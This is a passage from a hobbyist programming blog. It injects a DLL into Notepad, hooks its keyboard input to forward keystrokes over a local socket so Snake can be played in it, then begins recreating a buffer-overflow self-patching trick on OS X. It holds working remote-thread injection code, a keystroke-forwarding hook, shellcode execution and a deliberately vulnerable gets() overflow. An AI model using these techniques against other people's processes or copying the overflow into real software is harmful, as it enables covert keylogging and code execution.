<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not open process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//once the process is open, we need to write the name of our dll to that process' memory</span>
<span class="kt">size_t</span> <span class="n">dllPathLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">dllPath</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">dllPathRemote</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//let the system decide where to allocate the memory</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="c1">//actually commit the virtual memory</span>
<span class="n">PAGE_READWRITE</span><span class="p">);</span> <span class="c1">//mem access for committed page</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dllPathRemote</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not allocate %zd bytes in process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">writeSucceeded</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="n">dllPathRemote</span><span class="p">,</span>
<span class="n">dllPath</span><span class="p">,</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">writeSucceeded</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not write %zd bytes to process with pid %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now get address of LoadLibraryW function inside Kernel32.dll</span>
<span class="c1">//TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"</span>
<span class="n">PTHREAD_START_ROUTINE</span> <span class="n">loadLibraryFunc</span> <span class="o">=</span> <span class="p">(</span><span class="n">PTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="n">TEXT</span><span class="p">(</span><span class="s">"Kernel32.dll"</span><span class="p">)),</span> <span class="s">"LoadLibraryA"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">loadLibraryFunc</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not find LoadLibraryA function inside kernel32.dll</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now create a thread in remote process that loads our target dll using LoadLibraryA</span>
<span class="n">HANDLE</span> <span class="n">remoteThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//default thread security</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//stack size for thread</span>
<span class="n">loadLibraryFunc</span><span class="p">,</span> <span class="c1">//pointer to start of thread function (for us, LoadLibraryA)</span>
<span class="n">dllPathRemote</span><span class="p">,</span> <span class="c1">//pointer to variable being passed to thread function</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//0 means the thread runs immediately after creation</span>
<span class="nb">NULL</span><span class="p">);</span> <span class="c1">//we don't care about getting back the thread identifier</span>
<span class="k">if</span> <span class="p">(</span><span class="n">remoteThread</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not create remote thread.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="s">"Success! remote thread started in process %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Wait for the remote thread to terminate</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
<span class="c1">//once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down</span>
<span class="n">VirtualFreeEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">dllPathRemote</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">handle</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="nf">findPidByName</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">h</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">singleProcess</span><span class="p">;</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span> <span class="c1">//takes a snapshot of specified processes</span>
<span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="c1">//get all processes</span>
<span class="mi">0</span><span class="p">);</span> <span class="c1">//ignored for SNAPPROCESS</span>
<span class="n">singleProcess</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="k">do</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">singleProcess</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">singleProcess</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"PID Found: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">));</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printHelp</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">createRemoteThread</span><span class="p">(</span><span class="n">findPidByName</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<p>This was enough to get a message box popping up in a running instance of Notepad, which was super cool. Unfortunately I realized pretty much immediately after I got this working that I had no idea how to go from popping a message box to using this to actually change Notepad’s behaviour.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/message_popup.PNG" />
<font size="2">Celebrate the little things</font>
<br /><br />
</div>
<h2 id="lets-try-hooking">Let’s Try Hooking!</h2>
<p>My message box app could make something new happen in another process, but I actually needed to be able to <em>change</em> the behaviour of the target process. I had heard vaguely about api hooking before, and my limited understanding of it was that it allowed you to either replace existing code paths, or add additional functionality to them. This seemed roughly in line with what I wanted, so I dove down this rabbit hole next.</p>
<p>Googling for how hooking works was less straightforward than dll injection, mostly because hooking is much more complicated. I eventually realized that as long as I wanted to change a program’s reponse to a Windows system message, I could bypass a lot of this complexity and use a Win32 hook. Given that keyboard input is sent to Windows processes via WH_KEYBOARD messages, I was in luck.</p>
<p>The <a href="https://docs.microsoft.com/en-us/windows/win32/winmsg/hooks">MDSN page for hooks</a> provides some basic information about how these types of hooks work, but the general idea is like this (note: I’m a super beginner at all of this so take everything I say with a grain of salt):</p>
<ul>
<li>Windows apps (and individual Win32 controls) receive events from the OS via system messages.</li>
<li>Before these messages are passed to the message handling function for a given Win32 window, it first gets passed to that system message’s “hook chain,” which is a list of functions that perform some action in response to that event type before the window has a chance to respond.</li>
<li>Each hook function is responsible for passing the system message information to the next item in the hook chain</li>
<li>If a hook function <em>doesn’t</em> call the next function in the hook chain, the message can be lost before the window ever gets a chance to respond to it.</li>
</ul>
<p>Given this information, it seemed reasonable to try to intercept the keyboard events sent to Notepad by creating a hook function which intentionally didn’t call the next function in the hook chain. After persuing the msdn docs page about <a href="https://docs.microsoft.com/en-us/windows/win32/winmsg/using-hooks">using hooks</a>, I figured out that I was going to need to install a WH_KEYBOARD hook into Notepad’s Edit control.</p>
<p>The docs also point out that if you want to install a hook in a process other than your own, what you’re really doing is a form of dll injection. You need to place the hook function in a dll, and use SetWindowsHookEx() to load that dll’s code into the target application.</p>
<p>So with all that in mind, I put on my robe and wizard hat and got to work.</p>
<h2 id="writing-a-simple-hook-payload">Writing a Simple Hook Payload</h2>
<p>I started off by just trying to prevent Notepad from receiving keyboard input at all. All I needed to do for this was to hook the WH_KEYBOARD and then <em>not</em> call the next hook in the hook chain, which seemed like an easy place to start. To write a hook function for WH_KEYBOARD, all you need to do is make sure to match the function signature of <a href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644984(v=vs.85)">KeyboardProc()</a>. Given that I needed this function to do basically nothing, this was pretty easy:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include "inject_payload_disablekeyinput.h"
</span>
<span class="n">LRESULT</span> <span class="n">CALLBACK</span> <span class="nf">KeyboardProc</span><span class="p">(</span><span class="kt">int</span> <span class="n">code</span><span class="p">,</span> <span class="n">WPARAM</span> <span class="n">wParam</span><span class="p">,</span> <span class="n">LPARAM</span> <span class="n">lParam</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<h2 id="installing-a-hook-in-notepadexe">Installing A Hook In Notepad.exe</h2>
<p>The code for installing a windows hook is very straightforward (and shown below).</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">bool</span> <span class="nf">installRemoteHook</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">threadId</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">hookDLL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">hookLib</span> <span class="o">=</span> <span class="n">LoadLibrary</span><span class="p">(</span><span class="n">hookDLL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hookLib</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">HOOKPROC</span> <span class="n">hookFunc</span> <span class="o">=</span> <span class="p">(</span><span class="n">HOOKPROC</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hookLib</span><span class="p">,</span> <span class="s">"KeyboardProc"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hookFunc</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">SetWindowsHookEx</span><span class="p">(</span><span class="n">WH_KEYBOARD</span><span class="p">,</span> <span class="n">hookFunc</span><span class="p">,</span> <span class="n">hookLib</span><span class="p">,</span> <span class="n">threadId</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The threadId function argument is used to install the hook only for Notepad’s Edit control (otherwise it becomes a global hook). Getting the thread id is juat a matter of calling <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getwindowthreadprocessid">GetWindowThreadProcessId()</a> on the HWND for the Edit control. You can get the HWND with the GetWindowForProcessAndClassName() function from <a href="/blog/2020/05/20/Rendering-With-Notepad.html">my last post</a>. Here’s that function again:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">HWND</span> <span class="nf">GetWindowForProcessAndClassName</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">pid</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">className</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HWND</span> <span class="n">curWnd</span> <span class="o">=</span> <span class="n">GetTopWindow</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">//0 arg means to get the window at the top of the Z order</span>
<span class="kt">char</span> <span class="n">classNameBuf</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span><span class="n">curWnd</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">){</span>
<span class="n">DWORD</span> <span class="n">curPid</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">dwThreadId</span> <span class="o">=</span> <span class="n">GetWindowThreadProcessId</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="o">&</span><span class="n">curPid</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">curPid</span> <span class="o">==</span> <span class="n">pid</span><span class="p">){</span>
<span class="n">GetClassName</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="n">classNameBuf</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">className</span><span class="p">,</span> <span class="n">classNameBuf</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">return</span> <span class="n">curWnd</span><span class="p">;</span>
<span class="n">HWND</span> <span class="n">childWindow</span> <span class="o">=</span> <span class="n">FindWindowEx</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">className</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">childWindow</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">return</span> <span class="n">childWindow</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">curWnd</span> <span class="o">=</span> <span class="n">GetNextWindow</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="n">GW_HWNDNEXT</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>One thing to note about the installRemoteHook() function is that because it gets the function pointer for the callback with GetProcAddress(), the compiled name of the hook callback is important. This meant that I needed to make sure that to export that function using “extern C” to prevent the compiler from mangling the function name.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#pragma once
</span><span class="k">extern</span> <span class="s">"C"</span>
<span class="p">{</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">dllexport</span><span class="p">)</span> <span class="n">LRESULT</span> <span class="n">CALLBACK</span> <span class="n">KeyboardProc</span><span class="p">(</span><span class="kt">int</span> <span class="n">code</span><span class="p">,</span> <span class="n">WPARAM</span> <span class="n">wParam</span><span class="p">,</span> <span class="n">LPARAM</span> <span class="n">lParam</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If you want to see what all of this looks like in pactice, the <a href="https://github.com/khalladay/render-with-notepad">github repo</a> for this blog post has a proof of concept hooking app uses the hook payload described above to disable key input to an instance of Notepad.</p>
<h2 id="redirecting-keyboard-input-to-a-different-process">Redirecting Keyboard Input to a Different Process</h2>
<p>Simply preventing Notepad from getting keyboard input was cool and all, but it was a far cry from being able to redirect that output to a game. What I wanted to be able to do was both prevent Notepad from getting keyboard input (so that the user couldn’t type characters and mess up what I was rendering), <em>and</em> redirect that key input to the process I was using to control my game logic.</p>
<p>Redirecting the key input to a different process wasn’t much more difficult than preventing key input. I just copy/pasted the code for disabling key input and made the following changes:</p>
<ul>
<li>The Hooking app opens up a socket, and starts listening for messages before installing the hook</li>
<li>In the payload, when the first keyboard message is intercepted, the payload creates a client socket and connects to the Injector app</li>
<li>Then, whenever a keyboard message is seen by the hook callback, it sends that char code to the Injector app via this client socket</li>
</ul>
<p>I’m not going to walk through how to set up windows sockets (but all the code for doing so is on the <a href="https://github.com/khalladay/render-with-notepad">github page</a> for this project). Instead, I just want to share the hook payload that I used to make this all happen.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">SOCKET</span> <span class="n">sock</span> <span class="o">=</span> <span class="n">INVALID_SOCKET</span><span class="p">;</span>
<span class="n">LRESULT</span> <span class="n">CALLBACK</span> <span class="nf">KeyboardProc</span><span class="p">(</span><span class="kt">int</span> <span class="n">code</span><span class="p">,</span> <span class="n">WPARAM</span> <span class="n">wParam</span><span class="p">,</span> <span class="n">LPARAM</span> <span class="n">lParam</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">const</span> <span class="kt">int</span> <span class="n">BUFLEN</span> <span class="o">=</span> <span class="mi">512</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">sendBuf</span><span class="p">[</span><span class="n">BUFLEN</span><span class="p">];</span>
<span class="n">memset</span><span class="p">(</span><span class="n">sendBuf</span><span class="p">,</span> <span class="sc">'\0'</span><span class="p">,</span> <span class="n">BUFLEN</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sock</span> <span class="o">==</span> <span class="n">INVALID_SOCKET</span><span class="p">){</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">CreateClientSocket</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="s">"1337"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="n">isKeyDown</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">lParam</span> <span class="o">>></span> <span class="mi">30</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isKeyDown</span><span class="p">){</span>
<span class="n">_itoa_s</span><span class="o"><</span><span class="mi">512</span><span class="o">></span><span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">wParam</span><span class="p">,</span> <span class="n">sendBuf</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
<span class="n">send</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">sendBuf</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">strlen</span><span class="p">(</span><span class="n">sendBuf</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Extracting the key state from the lparam was a little weird, but it seemed like the best way to get at that information. If you wanted to write a more robust input handling hook, you’d probably care about more of the data in that parameter than I did, but this was enough for getting WASD.</p>
<p>Once this was working, it was a very small jump from there to a working real time game.</p>
<h2 id="snake-finally">Snake, Finally!</h2>
<p>So yeah, the fruit of all this labor isn’t super exciting. I made Snake. It lends itself super well to ascii graphics (even if the fact that characters are taller than they are wide is a bit annoying), and I already had the gameplay logic written from a <a href="/blog/2019/12/04/Recreating-A-Dirty-Gamedev-Hack.html">couple posts ago</a>.</p>
<p>There’s not really much interesting to say about implementing Snake, and I’ve already talked through everything else, so I’m going to end things off with another gif of me playing snake in a hijacked Notepad.exe window. I hope you enjoyed the process of getting here as much as I did, because the end product is (as promised) super dumb.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/snake.gif" />
<font size="2">It's a terrible quality gif... but you get the idea</font>
<br /><br />
</div>
Recreating An Old "Dirty Gamedev Trick"2019-12-04T00:00:00+00:00http://kylehalladay.com/blog/2019/12/04/Recreating-A-Dirty-Gamedev-Hack<p>There’s a story that pops up in my twitter feed every 6 months or so. The original version of it is from a Gamasutra article published in 2013 which contained a collection of stories of various “dirty” tricks used in previous games (<a href="https://www.gamasutra.com/view/feature/194772/dirty_game_development_tricks.php">link</a>). There’s a lot of fun stories in the article but one stands head and shoulders above the rest in terms of awesomeness. I’ve copied the specific story below so that this post makes sense even in the unlikely event of the original link going dead.</p>
<div style="padding-left: 20px; padding-right: 20px; line-height: 11pt; font-size:10pt; border:dashed; background-color:#FFEEDD">
<strong><font size="+1"><br />
(s)elf-exploitation</font></strong><br />
<font size="-1">Jonathan Garrett, Insomniac Games</font><br />
<br />
<em>Ratchet and Clank: Up Your Arsenal</em> was an online title that shipped without the ability to patch either code or data. Which was unfortunate.<br />
<br />
The game downloads and displays an End User License Agreement each time it's launched. This is an ascii string stored in a static buffer. This buffer is filled from the server without checking that the size is within the buffer's capacity.<br />
<br />
We exploited this fact to cause the EULA download to overflow the static buffer far enough to also overwrite a known global variable. This variable happened to be the function callback handler for a specific network packet. Once this handler was installed, we could send the network packet to cause a jump to the address in the overwritten global. The address was a pointer to some payload code that was stored earlier in the EULA data.<br />
<br />
Valuable data existed between the real end of the EULA buffer and the overwritten global, so the first job of the payload code was to restore this trashed data. Once that was done things were back to normal and the actual patching work could be done.<br />
<br />
One complication is that the EULA text is copied with strcpy. And strcpy ends when it finds a 0 byte (which is usually the end of the string). Our string contained code which often contains 0 bytes. So we mutated the compiled code such that it contained no zero bytes and had a carefully crafted piece of bootstrap asm to un-mutate it.<br />
<br />
By the end, the hack looked like this:<br />
<br />
1. Send oversized EULA<br />
2. Overflow EULA buffer, miscellaneous data, callback handler pointer<br />
3. Send packet to trigger handler<br />
4. Game jumps to bootstrap code pointed to by handler<br />
5. Bootstrap decodes payload data<br />
6. Payload downloads and restores stomped miscellaneous data<br />
7. Patch executes<br />
<br />
Takeaways: Include patching code in your shipped game, and don't use unbounded strcpy. <br />
<br />
</div>
<p><br /></p>
<p>Suffice to say that this story is not an example of what modern day game development is like, but I think that’s what makes it so appealing. Most of my day at work is spent sorting out problems in huge codebases made up of abstractions layered over other abstractions layered over third party libraries and legacy code. This is the polar opposite of that, and I want to get me some of it. So this is the story of how I recreated this on OS X.</p>
<p>I want to caveat the entire article by saying that this post is going to contain a lot of terrible assembly. I hadn’t written much assembly before I started this project and I’m sure it shows. That being said, let’s get started!</p>
<h2 id="first-you-can-run-arbitrary-machine-code-at-runtime">First: You Can Run Arbitrary Machine Code at Runtime?</h2>
<p>The first thing that jumped out at me in this story was the part about sending machine code over the network to be executed by the game. It had never occurred to me that this was possible, despite it being obvious in hindsight. With some help from <a href="http://www.vividmachines.com/shellcode/shellcode.html#linex1">this article</a>, I was able to prove that this was going to work on OS X too. First I wrote a quick bit of assembly (in this case, enough to call exit(42):</p>
<figure class="highlight"><pre><code class="language-as" data-lang="as"><span class="p">.</span><span class="nx">text</span>
<span class="p">.</span><span class="nx">globl</span> <span class="nx">_main</span>
<span class="nl">_main</span><span class="p">:</span>
<span class="nx">mov</span> <span class="nx">$42</span><span class="p">,</span> <span class="o">%</span><span class="nx">di</span>
<span class="nx">movl</span> <span class="nx">$0x2000001</span><span class="p">,</span> <span class="o">%</span><span class="nx">eax</span>
<span class="nx">syscall</span></code></pre></figure>
<p>Assembled it with OS X’s built in “as” tool, and disassembled it with objdump to get the hex machine code bytes:</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">1ff5: 66 bf 2a 00 movw $42, %di
1ff9: b8 01 00 00 02 movl $33554433, %eax
1ffe: 0f 05 syscall</code></pre></figure>
<p>Then I copied those bytes to a string and tried to run it:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">code</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05</span><span class="s">"</span><span class="p">;</span>
<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">code</span><span class="p">)();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The above returns the value 42 and the “return 0” statement never gets executed, which is cool. However, this wasn’t enough to prove anything because it only worked when the code string was a constant. Trying to copy that string to a different (non-constant) buffer and then execute the instructions there failed immediately:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">code</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05</span><span class="s">"</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">buff</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">buff</span><span class="p">,</span> <span class="n">code</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">buff</span><span class="p">)();</span> <span class="c1">// will fail with EXC_BAD_ACCESS </span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>As it turns out, OS X has memory protections to help prevent folks from doing these sorts of shenaningans. If you compile on the command line with the arguments “-Wl,-allow_stack_execute”, clang will happily let this code run just fine. In fact, that argument will allow the above code to work whether or not buff is on the stack, the bss section, or the data section.</p>
<p>Note that no matter what I did, I couldn’t get Xcode 10 to recognize that compiler flag, it had to be command line. It’s also important to note that if you compile objective-c code (or objective-c++) with this flag, the flag won’t work. I could be missing something, but I got bored and just fell back to the command line / plain C++ instead of continuing to fight with it.</p>
<p>The Playstation 2 was gone well before I entered the industry, but based on googling and asking a few coworkers who had some experience on it, it seems unlikely that the ps2 had the same kind of memory security, so I don’t feel too bad about disabling OS X’s to get this project done.</p>
<h2 id="step-two-useful-buffer-overflows">Step Two: Useful Buffer Overflows</h2>
<p>My next goal was to use a buffer overflow to redirect a function pointer to a buffer that I controlled. I’d never intentionally overflowed a buffer before, but boy do I have experience tracking and fixing memory stomps, so this felt pretty natural (in theory). In practice it was a bit messier. Consider the following code:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">hello</span><span class="p">();</span>
<span class="k">static</span> <span class="kt">char</span> <span class="n">buff</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">static</span> <span class="nf">void</span><span class="p">(</span><span class="o">*</span><span class="n">targetFunc</span><span class="p">)();</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">targetFunc</span> <span class="o">=</span> <span class="n">hello</span><span class="p">;</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buff</span><span class="p">);</span>
<span class="n">targetFunc</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">hello</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello World</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>While this code will absolutely crash, it’s not guaranteed that the compiler has positioned the static variables in the bss section of our executable in the same order that they appear in the code. In my case, they were actually located in the opposite order in my executable, as you can see in this snippet of <a href="https://www.hopperapp.com/">Hopper</a> output.</p>
